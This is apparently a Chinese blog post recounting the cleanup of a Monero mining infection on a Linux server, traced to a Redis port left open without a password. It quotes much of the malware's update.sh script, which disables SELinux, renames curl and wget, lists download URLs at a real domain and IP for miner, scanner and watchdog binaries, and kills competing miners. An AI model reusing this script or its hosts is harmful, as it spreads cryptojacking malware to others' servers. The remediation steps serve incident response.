挖礦病毒
排查
今天上線發現linux cpu飆升到100%
輸入top -c 命令找到最號cpu的進程
top -c
2.使用 kill -9后 幾秒會后 又起起來了
3.輸入命令
ls -l /proc/{pid號}/exe
4. 我們進入etc目錄下面看看
5.發現里面有個update.sh腳本文件 打開看看
etenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur miner_url="https://de.gsearch.com.de/api/sysupdate" miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate" miner_size="1102480" sh_url="https://de.gsearch.com.de/api/update.sh" sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh" config_url="https://de.gsearch.com.de/api/config.json" config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json" config_size="3356" scan_url="https://de.gsearch.com.de/api/networkservice" scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice" scan_size="2584072" watchdog_url="https://de.gsearch.com.de/api/sysguard" watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard" watchdog_size="1929480" kill_miner_proc() { ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9 ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9 ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9 ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9 ps ax|grep -o './[0-9]* -c'| xargs pkill -f ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback "update.sh" [readonly] 961L, 37659C
6.看不懂 試着在百度搜了一下這個地址
https://de.gsearch.com.de/api/sysupdate
6.確定這個就是那個自啟動挖礦腳本 刪除
rm -rf update.sh
tmd發現沒權限刪除
7.使用lsattr chattr2個命令
lsattr update.sh # 發現有 i 所以要干掉i才能刪除 chattr -i update.sh rm -rf update.sh # 刪除成功
8.殺掉進程
kill -9 13586
9.同樣的步驟 刪除networkservie
分析如何中毒的
1.安裝了redis打開了端口外網訪問。但是並沒有設置密碼
2.top找到redis進程和安裝目錄
cd /proc/5913
ll
設置密碼可參考
https://blog.csdn.net/qq_26440803/article/details/82967433
3.關閉端口任意機器可訪問 限制指定機器ip
第二次殺毒
以為昨晚上面這些以為就萬事大吉 結果沒一會兒又出現了 參考博文:https://www.cnblogs.com/brishenzhou/p/11770478.html